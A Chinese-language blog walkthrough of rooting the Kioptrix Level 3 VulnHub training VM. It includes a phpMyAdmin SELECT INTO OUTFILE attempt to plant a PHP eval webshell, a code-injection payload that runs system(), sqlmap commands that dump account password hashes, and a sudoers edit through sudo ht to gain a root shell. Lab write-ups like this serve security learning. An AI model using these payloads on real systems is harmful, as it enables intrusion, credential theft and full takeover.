信息安全CTFCTF-Web安全

渗透测试-KioptrixVM3靶机渗透

2020-04-03  本文已影响0人  LonelySong

1.环境部署
靶机下载地址:https://download.vulnhub.com/kioptrix/KVM3.rar
攻击机:Kali 2019.2 amd64
靶机 : KioptrixVM3靶机
目标:拿下靶机root权限
2.信息收集
使用arp-scan -l进行局域网主机发现


得到靶机IP地址,使用Nmap进行端口扫描 
nmap -sV 192.168.227.130

目标靶机仅仅开启了22和80端口
ssh服务一般就是爆破用户名和密码,不过这是没办法的办法,我们先看web服务。
使用dirb爆破一下目录,发现phpmyadmin页面



尝试登陆了一下,发现admin+空密码可以登录


=
通过页面错误信息,我的得到了网站的路径
/home/www/kioptrix3.com/

尝试使用phpmyadmin写入一句话木马


select '<?php eval($_POST[cmd]); ?>' into outfile '/home/www/kioptrix3.com/shell.php';

写入失败,可能没有写入权限



使用

show global variables like '%secure%';

查看secure_file_priv和secure_auth



当secure_file_priv为NULL时,表示限制Mysql不允许导入导出,所以爆出错误。
然后思路就断了,最后通过搜索发现了一个代码注入漏洞,测试漏洞可用性。

index.php?page=${@print(system("ls"))}\

命令执行成功。说明此漏洞可用。
但是不知道为什么,我尝试反弹shell失败了。
于是又去一通搜索,发现一个注入漏洞

http://ip/gallery/gallery.php?id=1

这个注入挺简单的,可以参考我的别的文章使用手工注入,我这里就不手工了,直接使用sqlmap一把梭。
查找数据库

sqlmap -u http://192.168.227.130/gallery/gallery.php?id=1 --dbs

成功跑出数据库,查找数据库gallery中的所有表。

sqlmap -u http://192.168.227.130/gallery/gallery.php?id=1 -D gallery --tables

成功跑出数据库gallery中的所有表名。先从第一个表开始爆破字段名。

sqlmap -u http://192.168.227.130/gallery/gallery.php?id=1 -D gallery -T dev_accounts --columns

爆破出3个字段,使用sqlmap读数据。

sqlmap -u http://192.168.227.130/gallery/gallery.php?id=1 -D gallery -T dev_accounts -C "id,username,password" --dump

跑出两对用户名和密码

+----+------------+----------------------------------+
| id | username   | password                         |
+----+------------+----------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+

使用解密网站对加密的密码尝试解密




两个md5全部成功解密。
首先我拿账号测试了一下web网站的后台,没有登陆成功,再尝试下shell。



测试第一个就登录成功,先看下权限,在看看有么有办法提权,如果不行,再尝试第二个账号。
尝试了ping命令suid提权,没有成功...
测试第二个账号看看

登录成功,发家目录下有两个文件,查看一下,根据文件提示,我们这个账号可能拥有sudo权限

loneferret@Kioptrix3:~$ head /etc/sudoers 
head: cannot open `/etc/sudoers' for reading: Permission denied

尝试查看/etc/sudoers 文件,发现没有权限,根据文件提示,sudo ht



发现报错,提示

Error opening terminal: xterm-256color.

通过搜索并尝试找到了解决方法:
使用export TERM=xterm-color,解决成功
sudo ht之后打开了这个界面



这是以root权限进入了一个文本编辑器,我们使用它按F3打开/etc/sudoers



给当前账号加上以root用户执行/bin/bash的权限。

按F2保存
然后使用sudo /bin/bash

可以看到我们现在已经拿到了root权限

上一篇 下一篇

猜你喜欢

热点阅读